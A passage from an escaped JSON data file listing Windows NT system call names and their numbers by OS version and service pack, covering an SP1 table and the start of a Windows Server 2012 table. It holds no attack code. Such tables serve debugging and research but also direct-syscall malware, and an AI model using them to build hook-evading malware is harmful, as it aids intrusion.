\"NtAccessCheck\": 97, \"NtAccessCheckByType\": 98, \"NtAccessCheckByTypeResultList\": 99, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 101, \"NtAddBootEntry\": 102, \"NtAddDriverEntry\": 103, \"NtAdjustGroupsToken\": 104, \"NtAlertResumeThread\": 105, \"NtAlertThread\": 106, \"NtAllocateLocallyUniqueId\": 107, \"NtAllocateReserveObject\": 108, \"NtAllocateUserPhysicalPages\": 109, \"NtAllocateUuids\": 110, \"NtAlpcAcceptConnectPort\": 111, \"NtAlpcCancelMessage\": 112, \"NtAlpcConnectPort\": 113, \"NtAlpcCreatePort\": 114, \"NtAlpcCreatePortSection\": 115, \"NtAlpcCreateResourceReserve\": 116, \"NtAlpcCreateSectionView\": 117, \"NtAlpcCreateSecurityContext\": 118, \"NtAlpcDeletePortSection\": 119, \"NtAlpcDeleteResourceReserve\": 120, \"NtAlpcDeleteSectionView\": 121, \"NtAlpcDeleteSecurityContext\": 122, \"NtAlpcDisconnectPort\": 123, \"NtAlpcImpersonateClientOfPort\": 124, \"NtAlpcOpenSenderProcess\": 125, \"NtAlpcOpenSenderThread\": 126, \"NtAlpcQueryInformation\": 127, \"NtAlpcQueryInformationMessage\": 128, \"NtAlpcRevokeSecurityContext\": 129, \"NtAlpcSendWaitReceivePort\": 130, \"NtAlpcSetInformation\": 131, \"NtAreMappedFilesTheSame\": 132, \"NtAssignProcessToJobObject\": 133, \"NtCancelIoFileEx\": 134, \"NtCancelSynchronousIoFile\": 135, \"NtCommitComplete\": 136, \"NtCommitEnlistment\": 137, \"NtCommitTransaction\": 138, \"NtCompactKeys\": 139, \"NtCompareTokens\": 140, \"NtCompleteConnectPort\": 141, \"NtCompressKey\": 142, \"NtConnectPort\": 143, \"NtCreateDebugObject\": 144, \"NtCreateDirectoryObject\": 145, \"NtCreateEnlistment\": 146, \"NtCreateEventPair\": 147, \"NtCreateIoCompletion\": 148, \"NtCreateJobObject\": 149, \"NtCreateJobSet\": 150, \"NtCreateKeyTransacted\": 151, \"NtCreateKeyedEvent\": 152, \"NtCreateMailslotFile\": 153, \"NtCreateMutant\": 154, \"NtCreateNamedPipeFile\": 155, \"NtCreatePagingFile\": 156, \"NtCreatePort\": 157, \"NtCreatePrivateNamespace\": 158, \"NtCreateProcess\": 159, \"NtCreateProfile\": 160, \"NtCreateProfileEx\": 161, \"NtCreateResourceManager\": 162, \"NtCreateSemaphore\": 163, \"NtCreateSymbolicLinkObject\": 164, \"NtCreateThreadEx\": 165, \"NtCreateTimer\": 166, \"NtCreateToken\": 167, \"NtCreateTransaction\": 168, \"NtCreateTransactionManager\": 169, \"NtCreateUserProcess\": 170, \"NtCreateWaitablePort\": 171, \"NtCreateWorkerFactory\": 172, \"NtDebugActiveProcess\": 173, \"NtDebugContinue\": 174, \"NtDeleteAtom\": 175, \"NtDeleteBootEntry\": 176, \"NtDeleteDriverEntry\": 177, \"NtDeleteFile\": 178, \"NtDeleteKey\": 179, \"NtDeleteObjectAuditAlarm\": 180, \"NtDeletePrivateNamespace\": 181, \"NtDeleteValueKey\": 182, \"NtDisableLastKnownGood\": 183, \"NtDisplayString\": 184, \"NtDrawText\": 185, \"NtEnableLastKnownGood\": 186, \"NtEnumerateBootEntries\": 187, \"NtEnumerateDriverEntries\": 188, \"NtEnumerateSystemEnvironmentValuesEx\": 189, \"NtEnumerateTransactionObject\": 190, \"NtExtendSection\": 191, \"NtFilterToken\": 192, \"NtFlushInstallUILanguage\": 193, \"NtFlushInstructionCache\": 194, \"NtFlushKey\": 195, \"NtFlushProcessWriteBuffers\": 196, \"NtFlushVirtualMemory\": 197, \"NtFlushWriteBuffer\": 198, \"NtFreeUserPhysicalPages\": 199, \"NtFreezeRegistry\": 200, \"NtFreezeTransactions\": 201, \"NtGetContextThread\": 202, \"NtGetCurrentProcessorNumber\": 203, \"NtGetDevicePowerState\": 204, \"NtGetMUIRegistryInfo\": 205, \"NtGetNextProcess\": 206, \"NtGetNextThread\": 207, \"NtGetNlsSectionPtr\": 208, \"NtGetNotificationResourceManager\": 209, \"NtGetPlugPlayEvent\": 210, \"NtGetWriteWatch\": 211, \"NtImpersonateAnonymousToken\": 212, \"NtImpersonateThread\": 213, \"NtInitializeNlsFiles\": 214, \"NtInitializeRegistry\": 215, \"NtInitiatePowerAction\": 216, \"NtIsSystemResumeAutomatic\": 217, \"NtIsUILanguageComitted\": 218, \"NtListenPort\": 219, \"NtLoadDriver\": 220, \"NtLoadKey\": 221, \"NtLoadKey2\": 222, \"NtLoadKeyEx\": 223, \"NtLockFile\": 224, \"NtLockProductActivationKeys\": 225, \"NtLockRegistryKey\": 226, \"NtLockVirtualMemory\": 227, \"NtMakePermanentObject\": 228, \"NtMakeTemporaryObject\": 229, \"NtMapCMFModule\": 230, \"NtMapUserPhysicalPages\": 231, \"NtModifyBootEntry\": 232, \"NtModifyDriverEntry\": 233, \"NtNotifyChangeDirectoryFile\": 234, \"NtNotifyChangeKey\": 235, \"NtNotifyChangeMultipleKeys\": 236, \"NtNotifyChangeSession\": 237, \"NtOpenEnlistment\": 238, \"NtOpenEventPair\": 239, \"NtOpenIoCompletion\": 240, \"NtOpenJobObject\": 241, \"NtOpenKeyEx\": 242, \"NtOpenKeyTransacted\": 243, \"NtOpenKeyTransactedEx\": 244, \"NtOpenKeyedEvent\": 245, \"NtOpenMutant\": 246, \"NtOpenObjectAuditAlarm\": 247, \"NtOpenPrivateNamespace\": 248, \"NtOpenProcessToken\": 249, \"NtOpenResourceManager\": 250, \"NtOpenSemaphore\": 251, \"NtOpenSession\": 252, \"NtOpenSymbolicLinkObject\": 253, \"NtOpenThread\": 254, \"NtOpenTimer\": 255, \"NtOpenTransaction\": 256, \"NtOpenTransactionManager\": 257, \"NtPlugPlayControl\": 258, \"NtPrePrepareComplete\": 259, \"NtPrePrepareEnlistment\": 260, \"NtPrepareComplete\": 261, \"NtPrepareEnlistment\": 262, \"NtPrivilegeCheck\": 263, \"NtPrivilegeObjectAuditAlarm\": 264, \"NtPrivilegedServiceAuditAlarm\": 265, \"NtPropagationComplete\": 266, \"NtPropagationFailed\": 267, \"NtPulseEvent\": 268, \"NtQueryBootEntryOrder\": 269, \"NtQueryBootOptions\": 270, \"NtQueryDebugFilterState\": 271, \"NtQueryDirectoryObject\": 272, \"NtQueryDriverEntryOrder\": 273, \"NtQueryEaFile\": 274, \"NtQueryFullAttributesFile\": 275, \"NtQueryInformationAtom\": 276, \"NtQueryInformationEnlistment\": 277, \"NtQueryInformationJobObject\": 278, \"NtQueryInformationPort\": 279, \"NtQueryInformationResourceManager\": 280, \"NtQueryInformationTransaction\": 281, \"NtQueryInformationTransactionManager\": 282, \"NtQueryInformationWorkerFactory\": 283, \"NtQueryInstallUILanguage\": 284, \"NtQueryIntervalProfile\": 285, \"NtQueryIoCompletion\": 286, \"NtQueryLicenseValue\": 287, \"NtQueryMultipleValueKey\": 288, \"NtQueryMutant\": 289, \"NtQueryOpenSubKeys\": 290, \"NtQueryOpenSubKeysEx\": 291, \"NtQueryPortInformationProcess\": 292, \"NtQueryQuotaInformationFile\": 293, \"NtQuerySecurityAttributesToken\": 294, \"NtQuerySecurityObject\": 295, \"NtQuerySemaphore\": 296, \"NtQuerySymbolicLinkObject\": 297, \"NtQuerySystemEnvironmentValue\": 298, \"NtQuerySystemEnvironmentValueEx\": 299, \"NtQuerySystemInformationEx\": 300, \"NtQueryTimerResolution\": 301, \"NtQueueApcThreadEx\": 302, \"NtRaiseException\": 303, \"NtRaiseHardError\": 304, \"NtReadOnlyEnlistment\": 305, \"NtRecoverEnlistment\": 306, \"NtRecoverResourceManager\": 307, \"NtRecoverTransactionManager\": 308, \"NtRegisterProtocolAddressInformation\": 309, \"NtRegisterThreadTerminatePort\": 310, \"NtReleaseKeyedEvent\": 311, \"NtReleaseWorkerFactoryWorker\": 312, \"NtRemoveIoCompletionEx\": 313, \"NtRemoveProcessDebug\": 314, \"NtRenameKey\": 315, \"NtRenameTransactionManager\": 316, \"NtReplaceKey\": 317, \"NtReplacePartitionUnit\": 318, \"NtReplyWaitReplyPort\": 319, \"NtRequestPort\": 320, \"NtResetEvent\": 321, \"NtResetWriteWatch\": 322, \"NtRestoreKey\": 323, \"NtResumeProcess\": 324, \"NtRollbackComplete\": 325, \"NtRollbackEnlistment\": 326, \"NtRollbackTransaction\": 327, \"NtRollforwardTransactionManager\": 328, \"NtSaveKey\": 329, \"NtSaveKeyEx\": 330, \"NtSaveMergedKeys\": 331, \"NtSecureConnectPort\": 332, \"NtSerializeBoot\": 333, \"NtSetBootEntryOrder\": 334, \"NtSetBootOptions\": 335, \"NtSetContextThread\": 336, \"NtSetDebugFilterState\": 337, \"NtSetDefaultHardErrorPort\": 338, \"NtSetDefaultLocale\": 339, \"NtSetDefaultUILanguage\": 340, \"NtSetDriverEntryOrder\": 341, \"NtSetEaFile\": 342, \"NtSetHighEventPair\": 343, \"NtSetHighWaitLowEventPair\": 344, \"NtSetInformationDebugObject\": 345, \"NtSetInformationEnlistment\": 346, \"NtSetInformationJobObject\": 347, \"NtSetInformationKey\": 348, \"NtSetInformationResourceManager\": 349, \"NtSetInformationToken\": 350, \"NtSetInformationTransaction\": 351, \"NtSetInformationTransactionManager\": 352, \"NtSetInformationWorkerFactory\": 353, \"NtSetIntervalProfile\": 354, \"NtSetIoCompletion\": 355, \"NtSetIoCompletionEx\": 356, \"NtSetLdtEntries\": 357, \"NtSetLowEventPair\": 358, \"NtSetLowWaitHighEventPair\": 359, \"NtSetQuotaInformationFile\": 360, \"NtSetSecurityObject\": 361, \"NtSetSystemEnvironmentValue\": 362, \"NtSetSystemEnvironmentValueEx\": 363, \"NtSetSystemInformation\": 364, \"NtSetSystemPowerState\": 365, \"NtSetSystemTime\": 366, \"NtSetThreadExecutionState\": 367, \"NtSetTimerEx\": 368, \"NtSetTimerResolution\": 369, \"NtSetUuidSeed\": 370, \"NtSetVolumeInformationFile\": 371, \"NtShutdownSystem\": 372, \"NtShutdownWorkerFactory\": 373, \"NtSignalAndWaitForSingleObject\": 374, \"NtSinglePhaseReject\": 375, \"NtStartProfile\": 376, \"NtStopProfile\": 377, \"NtSuspendProcess\": 378, \"NtSuspendThread\": 379, \"NtSystemDebugControl\": 380, \"NtTerminateJobObject\": 381, \"NtTestAlert\": 382, \"NtThawRegistry\": 383, \"NtThawTransactions\": 384, \"NtTraceControl\": 385, \"NtTranslateFilePath\": 386, \"NtUmsThreadYield\": 387, \"NtUnloadDriver\": 388, \"NtUnloadKey\": 389, \"NtUnloadKey2\": 390, \"NtUnloadKeyEx\": 391, \"NtUnlockFile\": 392, \"NtUnlockVirtualMemory\": 393, \"NtVdmControl\": 394, \"NtWaitForDebugEvent\": 395, \"NtWaitForKeyedEvent\": 396, \"NtWaitForWorkViaWorkerFactory\": 397, \"NtWaitHighEventPair\": 398, \"NtWaitLowEventPair\": 399, \"NtWorkerFactoryWorkerReady\": 400}, \"SP1\": {\"NtMapUserPhysicalPagesScatter\": 0, \"NtWaitForSingleObject\": 1, \"NtCallbackReturn\": 2, \"NtReadFile\": 3, \"NtDeviceIoControlFile\": 4, \"NtWriteFile\": 5, \"NtRemoveIoCompletion\": 6, \"NtReleaseSemaphore\": 7, \"NtReplyWaitReceivePort\": 8, \"NtReplyPort\": 9, \"NtSetInformationThread\": 10, \"NtSetEvent\": 11, \"NtClose\": 12, \"NtQueryObject\": 13, \"NtQueryInformationFile\": 14, \"NtOpenKey\": 15, \"NtEnumerateValueKey\": 16, \"NtFindAtom\": 17, \"NtQueryDefaultLocale\": 18, \"NtQueryKey\": 19, \"NtQueryValueKey\": 20, \"NtAllocateVirtualMemory\": 21, \"NtQueryInformationProcess\": 22, \"NtWaitForMultipleObjects32\": 23, \"NtWriteFileGather\": 24, \"NtSetInformationProcess\": 25, \"NtCreateKey\": 26, \"NtFreeVirtualMemory\": 27, \"NtImpersonateClientOfPort\": 28, \"NtReleaseMutant\": 29, \"NtQueryInformationToken\": 30, \"NtRequestWaitReplyPort\": 31, \"NtQueryVirtualMemory\": 32, \"NtOpenThreadToken\": 33, \"NtQueryInformationThread\": 34, \"NtOpenProcess\": 35, \"NtSetInformationFile\": 36, \"NtMapViewOfSection\": 37, \"NtAccessCheckAndAuditAlarm\": 38, \"NtUnmapViewOfSection\": 39, \"NtReplyWaitReceivePortEx\": 40, \"NtTerminateProcess\": 41, \"NtSetEventBoostPriority\": 42, \"NtReadFileScatter\": 43, \"NtOpenThreadTokenEx\": 44, \"NtOpenProcessTokenEx\": 45, \"NtQueryPerformanceCounter\": 46, \"NtEnumerateKey\": 47, \"NtOpenFile\": 48, \"NtDelayExecution\": 49, \"NtQueryDirectoryFile\": 50, \"NtQuerySystemInformation\": 51, \"NtOpenSection\": 52, \"NtQueryTimer\": 53, \"NtFsControlFile\": 54, \"NtWriteVirtualMemory\": 55, \"NtCloseObjectAuditAlarm\": 56, \"NtDuplicateObject\": 57, \"NtQueryAttributesFile\": 58, \"NtClearEvent\": 59, \"NtReadVirtualMemory\": 60, \"NtOpenEvent\": 61, \"NtAdjustPrivilegesToken\": 62, \"NtDuplicateToken\": 63, \"NtContinue\": 64, \"NtQueryDefaultUILanguage\": 65, \"NtQueueApcThread\": 66, \"NtYieldExecution\": 67, \"NtAddAtom\": 68, \"NtCreateEvent\": 69, \"NtQueryVolumeInformationFile\": 70, \"NtCreateSection\": 71, \"NtFlushBuffersFile\": 72, \"NtApphelpCacheControl\": 73, \"NtCreateProcessEx\": 74, \"NtCreateThread\": 75, \"NtIsProcessInJob\": 76, \"NtProtectVirtualMemory\": 77, \"NtQuerySection\": 78, \"NtResumeThread\": 79, \"NtTerminateThread\": 80, \"NtReadRequestData\": 81, \"NtCreateFile\": 82, \"NtQueryEvent\": 83, \"NtWriteRequestData\": 84, \"NtOpenDirectoryObject\": 85, \"NtAccessCheckByTypeAndAuditAlarm\": 86, \"NtQuerySystemTime\": 87, \"NtWaitForMultipleObjects\": 88, \"NtSetInformationObject\": 89, \"NtCancelIoFile\": 90, \"NtTraceEvent\": 91, \"NtPowerInformation\": 92, \"NtSetValueKey\": 93, \"NtCancelTimer\": 94, \"NtSetTimer\": 95, \"NtAcceptConnectPort\": 96, \"NtAccessCheck\": 97, \"NtAccessCheckByType\": 98, \"NtAccessCheckByTypeResultList\": 99, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 101, \"NtAddBootEntry\": 102, \"NtAddDriverEntry\": 103, \"NtAdjustGroupsToken\": 104, \"NtAlertResumeThread\": 105, \"NtAlertThread\": 106, \"NtAllocateLocallyUniqueId\": 107, \"NtAllocateReserveObject\": 108, \"NtAllocateUserPhysicalPages\": 109, \"NtAllocateUuids\": 110, \"NtAlpcAcceptConnectPort\": 111, \"NtAlpcCancelMessage\": 112, \"NtAlpcConnectPort\": 113, \"NtAlpcCreatePort\": 114, \"NtAlpcCreatePortSection\": 115, \"NtAlpcCreateResourceReserve\": 116, \"NtAlpcCreateSectionView\": 117, \"NtAlpcCreateSecurityContext\": 118, \"NtAlpcDeletePortSection\": 119, \"NtAlpcDeleteResourceReserve\": 120, \"NtAlpcDeleteSectionView\": 121, \"NtAlpcDeleteSecurityContext\": 122, \"NtAlpcDisconnectPort\": 123, \"NtAlpcImpersonateClientOfPort\": 124, \"NtAlpcOpenSenderProcess\": 125, \"NtAlpcOpenSenderThread\": 126, \"NtAlpcQueryInformation\": 127, \"NtAlpcQueryInformationMessage\": 128, \"NtAlpcRevokeSecurityContext\": 129, \"NtAlpcSendWaitReceivePort\": 130, \"NtAlpcSetInformation\": 131, \"NtAreMappedFilesTheSame\": 132, \"NtAssignProcessToJobObject\": 133, \"NtCancelIoFileEx\": 134, \"NtCancelSynchronousIoFile\": 135, \"NtCommitComplete\": 136, \"NtCommitEnlistment\": 137, \"NtCommitTransaction\": 138, \"NtCompactKeys\": 139, \"NtCompareTokens\": 140, \"NtCompleteConnectPort\": 141, \"NtCompressKey\": 142, \"NtConnectPort\": 143, \"NtCreateDebugObject\": 144, \"NtCreateDirectoryObject\": 145, \"NtCreateEnlistment\": 146, \"NtCreateEventPair\": 147, \"NtCreateIoCompletion\": 148, \"NtCreateJobObject\": 149, \"NtCreateJobSet\": 150, \"NtCreateKeyTransacted\": 151, \"NtCreateKeyedEvent\": 152, \"NtCreateMailslotFile\": 153, \"NtCreateMutant\": 154, \"NtCreateNamedPipeFile\": 155, \"NtCreatePagingFile\": 156, \"NtCreatePort\": 157, \"NtCreatePrivateNamespace\": 158, \"NtCreateProcess\": 159, \"NtCreateProfile\": 160, \"NtCreateProfileEx\": 161, \"NtCreateResourceManager\": 162, \"NtCreateSemaphore\": 163, \"NtCreateSymbolicLinkObject\": 164, \"NtCreateThreadEx\": 165, \"NtCreateTimer\": 166, \"NtCreateToken\": 167, \"NtCreateTransaction\": 168, \"NtCreateTransactionManager\": 169, \"NtCreateUserProcess\": 170, \"NtCreateWaitablePort\": 171, \"NtCreateWorkerFactory\": 172, \"NtDebugActiveProcess\": 173, \"NtDebugContinue\": 174, \"NtDeleteAtom\": 175, \"NtDeleteBootEntry\": 176, \"NtDeleteDriverEntry\": 177, \"NtDeleteFile\": 178, \"NtDeleteKey\": 179, \"NtDeleteObjectAuditAlarm\": 180, \"NtDeletePrivateNamespace\": 181, \"NtDeleteValueKey\": 182, \"NtDisableLastKnownGood\": 183, \"NtDisplayString\": 184, \"NtDrawText\": 185, \"NtEnableLastKnownGood\": 186, \"NtEnumerateBootEntries\": 187, \"NtEnumerateDriverEntries\": 188, \"NtEnumerateSystemEnvironmentValuesEx\": 189, \"NtEnumerateTransactionObject\": 190, \"NtExtendSection\": 191, \"NtFilterToken\": 192, \"NtFlushInstallUILanguage\": 193, \"NtFlushInstructionCache\": 194, \"NtFlushKey\": 195, \"NtFlushProcessWriteBuffers\": 196, \"NtFlushVirtualMemory\": 197, \"NtFlushWriteBuffer\": 198, \"NtFreeUserPhysicalPages\": 199, \"NtFreezeRegistry\": 200, \"NtFreezeTransactions\": 201, \"NtGetContextThread\": 202, \"NtGetCurrentProcessorNumber\": 203, \"NtGetDevicePowerState\": 204, \"NtGetMUIRegistryInfo\": 205, \"NtGetNextProcess\": 206, \"NtGetNextThread\": 207, \"NtGetNlsSectionPtr\": 208, \"NtGetNotificationResourceManager\": 209, \"NtGetPlugPlayEvent\": 210, \"NtGetWriteWatch\": 211, \"NtImpersonateAnonymousToken\": 212, \"NtImpersonateThread\": 213, \"NtInitializeNlsFiles\": 214, \"NtInitializeRegistry\": 215, \"NtInitiatePowerAction\": 216, \"NtIsSystemResumeAutomatic\": 217, \"NtIsUILanguageComitted\": 218, \"NtListenPort\": 219, \"NtLoadDriver\": 220, \"NtLoadKey\": 221, \"NtLoadKey2\": 222, \"NtLoadKeyEx\": 223, \"NtLockFile\": 224, \"NtLockProductActivationKeys\": 225, \"NtLockRegistryKey\": 226, \"NtLockVirtualMemory\": 227, \"NtMakePermanentObject\": 228, \"NtMakeTemporaryObject\": 229, \"NtMapCMFModule\": 230, \"NtMapUserPhysicalPages\": 231, \"NtModifyBootEntry\": 232, \"NtModifyDriverEntry\": 233, \"NtNotifyChangeDirectoryFile\": 234, \"NtNotifyChangeKey\": 235, \"NtNotifyChangeMultipleKeys\": 236, \"NtNotifyChangeSession\": 237, \"NtOpenEnlistment\": 238, \"NtOpenEventPair\": 239, \"NtOpenIoCompletion\": 240, \"NtOpenJobObject\": 241, \"NtOpenKeyEx\": 242, \"NtOpenKeyTransacted\": 243, \"NtOpenKeyTransactedEx\": 244, \"NtOpenKeyedEvent\": 245, \"NtOpenMutant\": 246, \"NtOpenObjectAuditAlarm\": 247, \"NtOpenPrivateNamespace\": 248, \"NtOpenProcessToken\": 249, \"NtOpenResourceManager\": 250, \"NtOpenSemaphore\": 251, \"NtOpenSession\": 252, \"NtOpenSymbolicLinkObject\": 253, \"NtOpenThread\": 254, \"NtOpenTimer\": 255, \"NtOpenTransaction\": 256, \"NtOpenTransactionManager\": 257, \"NtPlugPlayControl\": 258, \"NtPrePrepareComplete\": 259, \"NtPrePrepareEnlistment\": 260, \"NtPrepareComplete\": 261, \"NtPrepareEnlistment\": 262, \"NtPrivilegeCheck\": 263, \"NtPrivilegeObjectAuditAlarm\": 264, \"NtPrivilegedServiceAuditAlarm\": 265, \"NtPropagationComplete\": 266, \"NtPropagationFailed\": 267, \"NtPulseEvent\": 268, \"NtQueryBootEntryOrder\": 269, \"NtQueryBootOptions\": 270, \"NtQueryDebugFilterState\": 271, \"NtQueryDirectoryObject\": 272, \"NtQueryDriverEntryOrder\": 273, \"NtQueryEaFile\": 274, \"NtQueryFullAttributesFile\": 275, \"NtQueryInformationAtom\": 276, \"NtQueryInformationEnlistment\": 277, \"NtQueryInformationJobObject\": 278, \"NtQueryInformationPort\": 279, \"NtQueryInformationResourceManager\": 280, \"NtQueryInformationTransaction\": 281, \"NtQueryInformationTransactionManager\": 282, \"NtQueryInformationWorkerFactory\": 283, \"NtQueryInstallUILanguage\": 284, \"NtQueryIntervalProfile\": 285, \"NtQueryIoCompletion\": 286, \"NtQueryLicenseValue\": 287, \"NtQueryMultipleValueKey\": 288, \"NtQueryMutant\": 289, \"NtQueryOpenSubKeys\": 290, \"NtQueryOpenSubKeysEx\": 291, \"NtQueryPortInformationProcess\": 292, \"NtQueryQuotaInformationFile\": 293, \"NtQuerySecurityAttributesToken\": 294, \"NtQuerySecurityObject\": 295, \"NtQuerySemaphore\": 296, \"NtQuerySymbolicLinkObject\": 297, \"NtQuerySystemEnvironmentValue\": 298, \"NtQuerySystemEnvironmentValueEx\": 299, \"NtQuerySystemInformationEx\": 300, \"NtQueryTimerResolution\": 301, \"NtQueueApcThreadEx\": 302, \"NtRaiseException\": 303, \"NtRaiseHardError\": 304, \"NtReadOnlyEnlistment\": 305, \"NtRecoverEnlistment\": 306, \"NtRecoverResourceManager\": 307, \"NtRecoverTransactionManager\": 308, \"NtRegisterProtocolAddressInformation\": 309, \"NtRegisterThreadTerminatePort\": 310, \"NtReleaseKeyedEvent\": 311, \"NtReleaseWorkerFactoryWorker\": 312, \"NtRemoveIoCompletionEx\": 313, \"NtRemoveProcessDebug\": 314, \"NtRenameKey\": 315, \"NtRenameTransactionManager\": 316, \"NtReplaceKey\": 317, \"NtReplacePartitionUnit\": 318, \"NtReplyWaitReplyPort\": 319, \"NtRequestPort\": 320, \"NtResetEvent\": 321, \"NtResetWriteWatch\": 322, \"NtRestoreKey\": 323, \"NtResumeProcess\": 324, \"NtRollbackComplete\": 325, \"NtRollbackEnlistment\": 326, \"NtRollbackTransaction\": 327, \"NtRollforwardTransactionManager\": 328, \"NtSaveKey\": 329, \"NtSaveKeyEx\": 330, \"NtSaveMergedKeys\": 331, \"NtSecureConnectPort\": 332, \"NtSerializeBoot\": 333, \"NtSetBootEntryOrder\": 334, \"NtSetBootOptions\": 335, \"NtSetContextThread\": 336, \"NtSetDebugFilterState\": 337, \"NtSetDefaultHardErrorPort\": 338, \"NtSetDefaultLocale\": 339, \"NtSetDefaultUILanguage\": 340, \"NtSetDriverEntryOrder\": 341, \"NtSetEaFile\": 342, \"NtSetHighEventPair\": 343, \"NtSetHighWaitLowEventPair\": 344, \"NtSetInformationDebugObject\": 345, \"NtSetInformationEnlistment\": 346, \"NtSetInformationJobObject\": 347, \"NtSetInformationKey\": 348, \"NtSetInformationResourceManager\": 349, \"NtSetInformationToken\": 350, \"NtSetInformationTransaction\": 351, \"NtSetInformationTransactionManager\": 352, \"NtSetInformationWorkerFactory\": 353, \"NtSetIntervalProfile\": 354, \"NtSetIoCompletion\": 355, \"NtSetIoCompletionEx\": 356, \"NtSetLdtEntries\": 357, \"NtSetLowEventPair\": 358, \"NtSetLowWaitHighEventPair\": 359, \"NtSetQuotaInformationFile\": 360, \"NtSetSecurityObject\": 361, \"NtSetSystemEnvironmentValue\": 362, \"NtSetSystemEnvironmentValueEx\": 363, \"NtSetSystemInformation\": 364, \"NtSetSystemPowerState\": 365, \"NtSetSystemTime\": 366, \"NtSetThreadExecutionState\": 367, \"NtSetTimerEx\": 368, \"NtSetTimerResolution\": 369, \"NtSetUuidSeed\": 370, \"NtSetVolumeInformationFile\": 371, \"NtShutdownSystem\": 372, \"NtShutdownWorkerFactory\": 373, \"NtSignalAndWaitForSingleObject\": 374, \"NtSinglePhaseReject\": 375, \"NtStartProfile\": 376, \"NtStopProfile\": 377, \"NtSuspendProcess\": 378, \"NtSuspendThread\": 379, \"NtSystemDebugControl\": 380, \"NtTerminateJobObject\": 381, \"NtTestAlert\": 382, \"NtThawRegistry\": 383, \"NtThawTransactions\": 384, \"NtTraceControl\": 385, \"NtTranslateFilePath\": 386, \"NtUmsThreadYield\": 387, \"NtUnloadDriver\": 388, \"NtUnloadKey\": 389, \"NtUnloadKey2\": 390, \"NtUnloadKeyEx\": 391, \"NtUnlockFile\": 392, \"NtUnlockVirtualMemory\": 393, \"NtVdmControl\": 394, \"NtWaitForDebugEvent\": 395, \"NtWaitForKeyedEvent\": 396, \"NtWaitForWorkViaWorkerFactory\": 397, \"NtWaitHighEventPair\": 398, \"NtWaitLowEventPair\": 399, \"NtWorkerFactoryWorkerReady\": 400}}, \"Windows Server 2012\": {\"SP0\": {\"NtWorkerFactoryWorkerReady\": 0, \"NtMapUserPhysicalPagesScatter\": 1, \"NtWaitForSingleObject\": 2, \"NtCallbackReturn\": 3, \"NtReadFile\": 4, \"NtDeviceIoControlFile\": 5, \"NtWriteFile\": 6, \"NtRemoveIoCompletion\": 7, \"NtReleaseSemaphore\": 8, \"NtReplyWaitReceivePort\": 9, \"NtReplyPort\": 10, \"NtSetInformationThread\": 11, \"NtSetEvent\": 12, \"NtClose\": 13, \"NtQueryObject\": 14, \"NtQueryInformationFile\": 15, \"NtOpenKey\": 16, \"NtEnumerateValueKey\": 17, \"NtFindAtom\": 18, \"NtQueryDefaultLocale\": 19, \"NtQueryKey\": 20, \"NtQueryValueKey\": 21, \"NtAllocateVirtualMemory\": 22, \"NtQueryInformationProcess\": 23, \"NtWaitForMultipleObjects32\": 24, \"NtWriteFileGather\": 25, \"NtSetInformationProcess\": 26, \"NtCreateKey\": 27, \"NtFreeVirtualMemory\": 28, \"NtImpersonateClientOfPort\": 29, \"NtReleaseMutant\": 30, \"NtQueryInformationToken\": 31, \"NtRequestWaitReplyPort\": 32, \"NtQueryVirtualMemory\": 33, \"NtOpenThreadToken\": 34, \"NtQueryInformationThread\": 35, \"NtOpenProcess\": 36, \"NtSetInformationFile\": 37, \"NtMapViewOfSection\": 38, \"NtAccessCheckAndAuditAlarm\": 39, \"NtUnmapViewOfSection\": 40, \"NtReplyWaitReceivePortEx\": 41, \"NtTerminateProcess\": 42, \"NtSetEventBoostPriority\": 43, \"NtReadFileScatter\": 44, \"NtOpenThreadTokenEx\": 45, \"NtOpenProcessTokenEx\": 46, \"NtQueryPerformanceCounter\": 47, \"NtEnumerateKey\": 48, \"NtOpenFile\": 49, \"NtDelayExecution\": 50, \"NtQueryDirectoryFile\": 51, \"NtQuerySystemInformation\": 52, \"NtOpenSection\": 53, \"NtQueryTimer\": 54, \"NtFsControlFile\": 55, \"NtWriteVirtualMemory\": 56, \"NtCloseObjectAuditAlarm\": 57, \"NtDuplicateObject\": 58, \"NtQueryAttributesFile\": 59, \"NtClearEvent\": 60, \"NtReadVirtualMemory\": 61, \"NtOpenEvent\": 62, \"NtAdjustPrivilegesToken\": 63, \"NtDuplicateToken\": 64, \"NtContinue\": 65, \"NtQueryDefaultUILanguage\": 66, \"NtQueueApcThread\": 67, \"NtYieldExecution\": 68, \"NtAddAtom\": 69, \"NtCreateEvent\": 70, \"NtQueryVolumeInformationFile\": 71, \"NtCreateSection\": 72, \"NtFlushBuffersFile\": 73, \"NtApphelpCacheControl\": 74, \"NtCreateProcessEx\": 75, \"NtCreateThread\": 76, \"NtIsProcessInJob\": 77, \"NtProtectVirtualMemory\": 78, \"NtQuerySection\": 79, \"NtResumeThread\": 80, \"NtTerminateThread\": 81, \"NtReadRequestData\": 82, \"NtCreateFile\": 83, \"NtQueryEvent\": 84, \"NtWriteRequestData\": 85, \"NtOpenDirectoryObject\": 86, \"NtAccessCheckByTypeAndAuditAlarm\": 87, \"NtQuerySystemTime\": 88, \"NtWaitForMultipleObjects\": 89, \"NtSetInformationObject\": 90, \"NtCancelIoFile\": 91, \"NtTraceEvent\": 92, \"NtPowerInformation\": 93, \"NtSetValueKey\": 94, \"NtCancelTimer\": 95, \"NtSetTimer\": 96, \"NtAcceptConnectPort\": 97, \"NtAccessCheck\": 98, \"NtAccessCheckByType\": 99, \"NtAccessCheckByTypeResultList\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 101, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 102, \"NtAddAtomEx\": 103, \"NtAddBootEntry\": 104, \"NtAddDriverEntry\": 105, \"NtAdjustGroupsToken\": 106, \"NtAdjustTokenClaimsAndDeviceGroups\": 107, \"NtAlertResumeThread\": 108, \"NtAlertThread\": 109, \"NtAlertThreadByThreadId\": 110, \"NtAllocateLocallyUniqueId\": 111, \"NtAllocateReserveObject\": 112, \"NtAllocateUserPhysicalPages\": 113, \"NtAllocateUuids\": 114, \"NtAlpcAcceptConnectPort\": 115, \"NtAlpcCancelMessage\": 116, \"NtAlpcConnectPort\": 117, \"NtAlpcConnectPortEx\": 118, \"NtAlpcCreatePort\": 119, \"NtAlpcCreatePortSection\": 120, \"NtAlpcCreateResourceReserve\": 121, \"NtAlpcCreateSectionView\": 122, \"NtAlpcCreateSecurityContext\": 123, 